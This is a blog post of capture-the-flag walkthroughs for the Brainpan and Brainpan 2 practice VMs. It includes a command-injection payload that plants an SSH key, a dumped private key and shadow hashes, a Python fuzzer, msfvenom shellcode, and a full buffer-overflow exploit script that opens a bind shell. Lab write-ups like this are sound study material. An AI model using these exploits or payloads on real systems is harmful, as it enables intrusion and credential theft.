ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDX4IUIoXwwpfmsQPtiN/6qpVVJizA94po3G2T+Fwoua5LSz9cRYAQstX4K+Dt5AMZKbWfbT23sFnXfeMZJ6EqQ+Ql5JUUqwK/gAJR5i6pOwGW4XRUVyXplufDOQgliPcYfxg+VGW//qvwJ8k+O2q/CdEFoBlbGMaHLM+bhNYmzrHArSuJ2eOIjxORDQYmJjim2vd0G+8w2W3Uq/F7pZkW2QD/2dzws7kUTvMhlHuZUyE7uo+Wpq97RlbD1Ad3N1jw7CuQrbnOmssCowCrLgMatqw5gwLDxHa8eKNs0aep3y4Ua7W+FjI9hf750LefwmywmBBEUUoDeA1sxgLJJkydR puck@brainpan2
>>
# IMPORT MY OWN SSH KEYS INTO PUCKS AUTHORIZED_KEYS FILE...
>> VIEW
ENTER FILE TO DOWNLOAD: file | echo "ssh-rsa AAAAB3NzaC1yc2wEAAAABIwAAAQEA8VC3iG3LqvKjMGlZZVdpo6bN66q4DIMavddQY8p+K53rncpIrZfbpdp7eGPQEVoQp5+SENpFeuocoCGN0QjL3HIAXa32erj1fO8Y820JxjWutRIJBkBtqQQVhW8dxBWbzmlJyzZHj/TpKwpIym5Gx3J/j0SsvtMaWV4TJ7w+uumfH55JYN6QhjB9q8kn2ow6Wgm4eCkVIrnmzGYUsJhT5d7QYHt8JkJsD9n0SSOXHn9FJutPgzqxE+slGsCsphVZjK5INBJdaMyyyPVuMwgOr89zrjnMSEY5mcBASLGFTq425weGsgueAfEuZ7iq7KZbzAW28Q9JBh6BQOk4N/dp9w== root@bt" > ~/.ssh/authorized_keys
>> VIEW
ENTER FILE TO DOWNLOAD: file | chmod 700 ~/.ssh/authorized_keys
>>
# FINDING THE SSH SERVICE...
root@brainpan2:/root# cat /etc/ssh/sshd_config | grep Port
Port 2222
# Since SSH port 2222/tcp wasn't accessible externally, I had to use a reverse SSH port forward to my local machine.
root@bt:~# ssh root@192.168.1.112 -R 2223:127.0.0.1:2222
ssh root@192.168.1.112 -R 2223:127.0.0.1:2222
The authenticity of host '192.168.1.112 (192.168.1.112)' can't be established.
RSA key fingerprint is 26:89:29:85:ce:d2:69:0e:94:d0:3c:7a:21:cc:10:a1.
Are you sure you want to continue connecting (yes/no)? yes
yes
Warning: Permanently added '192.168.1.112' (RSA) to the list of known hosts.
root@192.168.1.112's password: **********
Warning: remote port forwarding failed for listen port 2223
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
System information as of Sun Mar 16 10:28:04 EDT 2014
System load: 0.08 Processes: 160
Usage of /: 58.3% of 19.06GB Users logged in: 1
Memory usage: 49% IP address for eth2: 192.168.1.112
Swap usage: 1%
=> /mnt/sdb is using 86.7% of 19.69GB
=> There is 1 zombie process.
Graph this data and manage this system at https://landscape.canonical.com/
Last login: Sun Mar 16 10:26:56 2014 from 192.168.1.122
root@bt:~#
# LOGIN AS PUCK VIA SSH
root@bt:/mnt/sdb/# ssh -l puck 127.0.0.1 -p 2223
Linux brainpan2 3.2.0-4-686-pae #1 SMP Debian 3.2.51-1 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
puck@brainpan2:~$
# SSH KEYS IN .BACKUP DIRECTORY...
# After finding the SSH keys in pucks home directory, I decided to try and login locally as "root " using pucks private keys...
puck@brainpan2:~/.backup/.ssh$ cat *
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA1+CFCKF8MKX5rED7Yjf+qqVVSYswPeKaNxtk/hcKLmuS0s/X
EWAELLV+Cvg7eQDGSm1n209t7BZ133jGSehKkPkJeSVFKsCv4ACUeYuqTsBluF0V
Fcl6ZbnwzkIJYj3GH8YPlRlv/6r8CfJPjtqvwnRBaAZWxjGhyzPm4TWJs6xwK0ri
dnjiI8TkQ0GJiY4ptr3dBvvMNlt1Kvxe6WZFtkA/9nc8LO5FE7zIZR7mVMhO7qPl
qave0ZWw9QHdzdY8OwrkK25zprLAqMAqy4DGrasOYMCw8R2vHijbNGnqd8uFGu1v
hYyPYX++dC3n8JssJgQRFFKA3gNbMYCySZMnUQIDAQABAoIBAE5C8Be763j7gvNG
r5vg7utQewXpdvjIgN3/iXJwSdmgWB8jCDYdWAYZWfOCIJVyiXCMDz27ov8W+W6l
q0U5+GZsUlngAB5KsrgDndAeqQRZzcazwCQg4cWlTj6IRDygZoY4WIfWK/tFMpAs
j1kbwOI/IUMkIStC7QPs8gOtVBmVfFKxrF1Le5mY7b32ETj/0Knebp7naLF64lnn
LSQUqUFohMCiSmQk5zG/e+6f0ZG0qWQw+XNsyGigVAJ0gNC/+5OxQV0h517oPFW6
OwwevwJkwZnZbUfn6T8Hyaa8UtinNDVTgb2s+pGHxGD6g1neClacDd67vZP5IwsQ
zdZagd0CgYEA+2nfv28sem/+M8JWSm70xJVL4okH569/bWHcp/7iPloDtReEECrR
WGPMvwh6q2wh0hU1kWvUSt+fC21AgPlu0jnHdkxK9gyYLSp8cmQuk/c6IEI3Jsk8
aqF2pihaSuZdBPbWgre/EXIKXVoQpIH3QKLUNdA9C71PnuvDGpC6TOcCgYEA29Cv
wCMcKsqEI+dQhHjFZzlwmBIeF2VoeMiv7MFbnpAvPprR6N2KOJxXdQivvE8rskBL
buIthSAVLPvDRFBswUCkmKeJlnuwy/QzOfeyGpCPKhtxz+BX83XzYISfCpAQDLGA
fxTdrxW3aJ1le9hkMfkaUrqqV1wg5/veqWml6wcCgYBpevoM7y/SDrqwLJDXmcXH
1HuKB8PxSIhF9BEHysBROKLlj4Aw6EX8t6JnY79TvIJUCeH3qS3gXAH2YVf2xK/i
M6ujzk6E/LO7/19G/xErs0YH0sAg3b0jX6rP+44mbpAITSeioEThpN8EW40v9/cs
fyRZj4yNKFgHbRLmSmJfcQKBgFl2gOExKPidfdRjA5k20hjl/tZVoVuiUTe/biJs
u844HpJbTo15BRVvRAUE6Qk6K62bj1fsw9wHp7asLNfz559roNHkdhIB+322wNaZ
4in/pdTcYKDbTNBwtAIXV+djpLSV1ZdjNapZq1DvpmsWMglIuhbrlAKEI3xnPUM0
FWwnAoGBAOniWAvJMvrIAeYjjFsdU7w9KSY/PG/0dVFELikt800DRMMYZ+I+z8sL
GWceTsJpJHVIgC+BBvt8jCLf2bmdZs1W7w/W459+FYAxB21aUELPblQRfuBsEjHs
nKXuwj5sY94uQfoX8TWdP5ETp78DAcacxplt2s8EI3NmX2UpqFf9
-----END RSA PRIVATE KEY-----
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDX4IUIoXwwpfmsQPtiN/6qpVVJizA94po3G2T+Fwoua5LSz9cRYAQstX4K+Dt5AMZKbWfbT23sFnXfeMZJ6EqQ+Ql5JUUqwK/gAJR5i6pOwGW4XRUVyXplufDOQgliPcYfxg+VGW//qvwJ8k+O2q/CdEFoBlbGMaHLM+bhNYmzrHArSuJ2eOIjxORDQYmJjim2vd0G+8w2W3Uq/F7pZkW2QD/2dzws7kUTvMhlHuZUyE7uo+Wpq97RlbD1Ad3N1jw7CuQrbnOmssCowCrLgMatqw5gwLDxHa8eKNs0aep3y4Ua7W+FjI9hf750LefwmywmBBEUUoDeA1sxgLJJkydR puck@brainpan2
puck@brainpan2:~/.backup/.ssh$ ls
id_rsa id_rsa.pub
puck@brainpan2:~/.backup/.ssh$ ssh -l "root " -i id_rsa brainpan2 -p 2222
Linux brainpan2 3.2.0-4-686-pae #1 SMP Debian 3.2.51-1 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Nov 7 11:00:06 2013
root @brainpan2:~# whoami
root
root @brainpan2:~#
root @brainpan2:/root# cat flag.txt
!!! CONGRATULATIONS !!!
You've completed the Brainpan 2 challenge!
Or have you...?
Yes, you have! Pat yourself on the back. :-)
Questions, comments, suggestions for new VM
challenges? Let me know!
Twitter: @superkojiman
Email : contact@techorganic.com
Web : http://www.techorganic.com
root @brainpan2:/root# cat /etc/shadow
root :$6$D9VnvbNB$fj0rwgveUnYfVgMezCv1OWZg7MlEJFdmjjCSSdmSJ8UtOD8vSQiWnCjTtPK9J956Ll5YMwAU5yiYVErApMSUu1:16013:0:99999:7:::
daemon:*:16013:0:99999:7:::
bin:*:16013:0:99999:7:::
sys:*:16013:0:99999:7:::
sync:*:16013:0:99999:7:::
games:*:16013:0:99999:7:::
man:*:16013:0:99999:7:::
lp:*:16013:0:99999:7:::
mail:*:16013:0:99999:7:::
news:*:16013:0:99999:7:::
uucp:*:16013:0:99999:7:::
root:*:16013:0:99999:7:::
proxy:*:16013:0:99999:7:::
www-data:*:16013:0:99999:7:::
backup:*:16013:0:99999:7:::
list:*:16013:0:99999:7:::
irc:*:16013:0:99999:7:::
gnats:*:16013:0:99999:7:::
nobody:*:16013:0:99999:7:::
libuuid:!:16013:0:99999:7:::
Debian-exim:!:16013:0:99999:7:::
statd:*:16013:0:99999:7:::
sshd:*:16013:0:99999:7:::
anansi:$6$pUKVkq5n$y9uizRLIziMu7qQtVhcctuSTXgimRelQ8bMSY3Anu5b/vIa1criuKauGEwZiXJujq9PIliI2AD31RW7WXsw9w1:16013:0:99999:7:::
puck:$6$lihKYSRT$DxZVlB/o1MRsumsls438zlB2wGJXdBk6wtzU8l2i/txd2o1xzpWeEjqoQCX/JRc3OIBMgfj7sG9O2hsh2YS4i/:16013:0:99999:7:::
reynard:$6$ldLpysqz$8SaEWO5Cr.rtq9BUC/34dpriABZEshmGaqK/UrlP.fFV2DrZOgjES6kFRbtOfuhLvu16nAca4jtSYbMq/wyiE1:16013:0:99999:7:::
root @brainpan2:/root#
# GAME OVER!
# Questions? Comments? Let me know. -1N3
Thursday, November 21, 2013
Brainpan Pentest VM Solution
BRAINPAN PENTEST VM SOLUTION BY 1N3
`7MN. `7MF'
__, MMN. M
`7MM M YMb M pd""b.
MM M `MN. M (O) `8b
MM M `MM.M ,89
MM M YMM ""Yb.
.JMML..JML. YM 88
(O) .M'
bmmmd'
# OVERVIEW
Brainpan is a test VM solution used for Pentesting/Hacking simulations. For more info, go to http://blog.techorganic.com/2013/03/brainpan-hacking-challenge.html. This walk through covers the basic steps to obtain "root" access to brainpan.
# DISCOVER HOSTS
netdiscover -r 192.168.1.0/24
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.1.132 00:0c:29:90:72:0d 01 060 VMware, Inc.
# PORT SCAN
nmap -sV 192.168.1.132
Nmap scan report for 192.168.1.132
Host is up (0.00041s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
9999/tcp open abyss?
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port9999-TCP:V=6.25%I=7%D=11/6%Time=5279FCEC%P=i686-pc-linux-gnu%r(NULL
SF:,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|\x
SF:20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x2
SF:0\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x20
SF:\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x20
SF:\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_\|
SF:\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x20
SF:_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x20
SF:_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x20
SF:THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20>>\x20");
MAC Address: 00:0C:29:90:72:0D (VMware)
# DIRBUSTER
#scan 192.168.1.132:10000 with dirbuster
dirbuster &
# dirbuster shows a static index.html page, a static image file, a bin directory and a brainpan.exe within the brainpan directory.
# DOWNLOAD brainpan.exe
wget http://192.168.1.132/bin/brainpan.exe
# RUN brainpan.exe FROM WINE...
wine brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[!] bind failed: 10048[+] bind done on port 9999
[+] waiting for connections.
* FROM THIS, WE CAN DETERMINE THAT brainpan.exe IS RUNNING IN WINE FOR LINUX ON PORT 9999/TCP ON THE REMOTE HOST...
# DEBUGGING & FUZZING
# Transfer brainpan.exe to a Windows XP machine for debugging using OllyGDB or Immunity Debugger. Find which bytes overwrite EIP, find suitable JMP ESP address. Use msfvenom to create bind shell for Linux using the brainpan IP. Create working buffer overflow exploit (see below).
# GENERATE UNIQUE BUFFER
msf exploit(ms06_040_netapi) > ruby pattern_create.rb 1024
[*] exec: ruby pattern_create.rb 1024
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B
#!/usr/bin/python
#Brainpan.exe fuzzer by 1N3 - 20131122
import socket
target = "192.168.1.119"
# 1024 bit unique string
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B"
print "Fuzzing port 9999 with " +str(len(buffer))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((target,9999))
s.recv(1024)
print "Sending evil buffer..." + buffer
s.send(buffer)
s.close()
root@bt:/mnt/sdb/nonxero/scripts/fuzzers# ./brainpan_fuzz.py
Fuzzing port 9999 with 1024
Sending evil buffer...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B
root@bt:/mnt/sdb/nonxero/scripts/fuzzers#
msf exploit(ms06_040_netapi) > ruby pattern_offset.rb 35724134
[*] exec: ruby pattern_offset.rb 35724134
[*] Exact match at offset 524
* This means from 524-528 bytes, EIP is overwritten...
# CONSTRUCT OUR SHELLCODE...
msfvenom -p linux/x86/shell_bind_tcp LHOST=192.168.1.132 LPORT=4444 -b "x00" -e x86/shikata_ga_nai
[*] x86/shikata_ga_nai succeeded with size 105 (iteration=1)
buf =
"\xda\xcd\xd9\x74\x24\xf4\xbf\x7d\x7b\x06\xd9\x5d\x33\xc9" +
"\xb1\x14\x83\xed\xfc\x31\x7d\x15\x03\x7d\x15\x9f\x8e\x37" +
"\x02\xa8\x92\x6b\xf7\x05\x3f\x8e\x7e\x48\x0f\xe8\x4d\x0a" +
"\x2b\xab\x1f\x62\xce\x53\xb1\x2e\xa4\x43\xe0\x9e\xb1\x85" +
"\x68\x78\x9a\x88\xed\x0d\x5b\x17\x5d\x09\xec\x71\x6c\x91" +
"\x4f\xce\x08\x5c\xcf\xbd\x8c\x34\xef\x99\xe3\x48\x46\x63" +
"\x04\x20\x76\xbc\x87\xd8\xe0\xed\x05\x71\x9f\x78\x2a\xd1" +
"\x0c\xf2\x4c\x61\xb9\xc9\x0f"
# CREATE THE EXPLOIT...
# brainpan_exploit.py by 1N3 - 20131121
#
# `7MN. `7MF'
# __, MMN. M
#`7MM M YMb M pd""b.
# MM M `MN. M (O) `8b
# MM M `MM.M ,89
# MM M YMM ""Yb.
#.JMML..JML. YM 88
# (O) .M'
# bmmmd'
#
#
#!/usr/bin/python
import socket
import os
import subprocess
# vars
target = "192.168.1.132"
buffer1 = '\x41' * 520
ebp = '\x90' * 4
EIP = "\xf3\x12\x17\x31" #311712F3 JMP ESP brainpan.exe
command = "nc -vv 192.168.1.132 4444"
#shellcode bind shell port 4444 192.168.1.132
shellcode = ("\xd9\xea\xd9\x74\x24\xf4\xbb\xda\x05\x64\xb7\x5a\x29\xc9" +
"\xb1\x14\x31\x5a\x19\x03\x5a\x19\x83\xc2\x04\x38\xf0\x55" +
"\x6c\x4b\x18\xc6\xd1\xe0\xb5\xeb\x5c\xe7\xfa\x8a\x93\x67" +
"\xa1\x0c\x7e\x0f\x54\xb1\x6f\x93\x32\xa1\xde\x7b\x4a\x20" +
"\x8a\x1d\x14\x6e\xcb\x68\xe5\x74\x7f\x6e\x56\x12\xb2\xee" +
"\xd5\x6b\x2a\x23\x59\x18\xea\xd1\x65\x47\xc0\xa5\xd3\x0e" +
"\x22\xcd\xcc\xdf\xa1\x65\x7b\x0f\x24\x1c\x15\xc6\x4b\x8e" +
"\xba\x51\x6a\x9e\x36\xaf\xed")
# NOOP sled
NOOP_sled = '\x90' * 104
# construct entire buffer - 1004 bytes
buffer = buffer1 + ebp + EIP + NOOP_sled + shellcode
print "**********************************************"
print "buffer1 length: " +str(len(buffer1))
print "EIP length: " +str(len(EIP))
print "shellcode length: " +str(len(shellcode))
print "NOOP_sled length: " +str(len(NOOP_sled))
print "Total buffer length: " +str(len(buffer))
print "**********************************************"
print "Fuzzing " + target + " on port 9999 with " +str(len(buffer)) + " bytes"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((target,9999))
s.recv(1024)
print "Sending evil buffer..." + buffer
s.send(buffer)
print "Done..."
print "Connecting to bind shell..."
subprocess.call(command)
os.system(command)
print "Done..."
s.close()
exit
# EXPLOIT
root@bt:/scripts/fuzzers# ./brainpan_exploit.py
**********************************************
buffer1 length: 520
EIP length: 4
shellcode length: 105
NOOP_sled length: 104
Total buffer length: 737
**********************************************
Fuzzing 192.168.1.132 on port 9999 with 737 bytes
Sending evil buffer...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����� 1�����������������������������������������������������������������������������������������������������������t$���d�Z)ɱ 1Z Z �� 8�UlK �����\����g�
~T�o�2��{J � n�h�tnV ���k*#Y ��eG��"��ߡe{$ �KQj�6�
Done...
Connecting to bind shell...
nc -vv 192.168.1.132 4444
whoami
puck
pwd
/home/puck/web
# DISTRO VERSION
cat /etc/release
Ubuntu 12.10
uname -a
Linux version 3.5.0-25-generic
# PROCESSES
ps -auxxx
root 732 1 0 06:47 ? 00:00:00 /usr/sbin/winbindd -F
root 838 732 0 06:47 ? 00:00:00 /usr/sbin/winbindd -F
...
...
puck 910 909 0 06:47 ? 00:00:00 /bin/sh -c /home/puck/checksrv.sh
puck 911 910 0 06:47 ? 00:00:00 /bin/bash /home/puck/checksrv.sh
puck 926 911 0 06:47 ? 00:00:02 /usr/bin/python -m SimpleHTTPServer 10000
puck 1693 1 0 08:49 ? 00:00:00 /bin//sh
puck 1949 1 0 08:53 ? 00:00:00 /home/puck/web/bin/brainpan.exe
puck 1953 1 0 08:53 ? 00:00:00 /usr/bin/wineserver
puck 1959 1 0 08:53 ? 00:00:00 C:\windows\system32\services.exe
puck 1963 1 0 08:53 ? 00:00:00 C:\windows\system32\winedevice.exe MountMgr
puck 1972 1 0 08:53 ? 00:00:00 C:\windows\system32\plugplay.exe
# CRONTAB
cat /etc/crontab
# what can I do with this? file is owned by root and run by root but how to edit?
# m h dom mon dow command
* * * * * /home/puck/checksrv.sh
# SHOW LAST USERS TO LOGIN
#
last
root tty1 Mon Mar 4 13:43 - 13:43 (00:00)
anansi tty3 Mon Mar 4 12:17 - 13:38 (01:20)
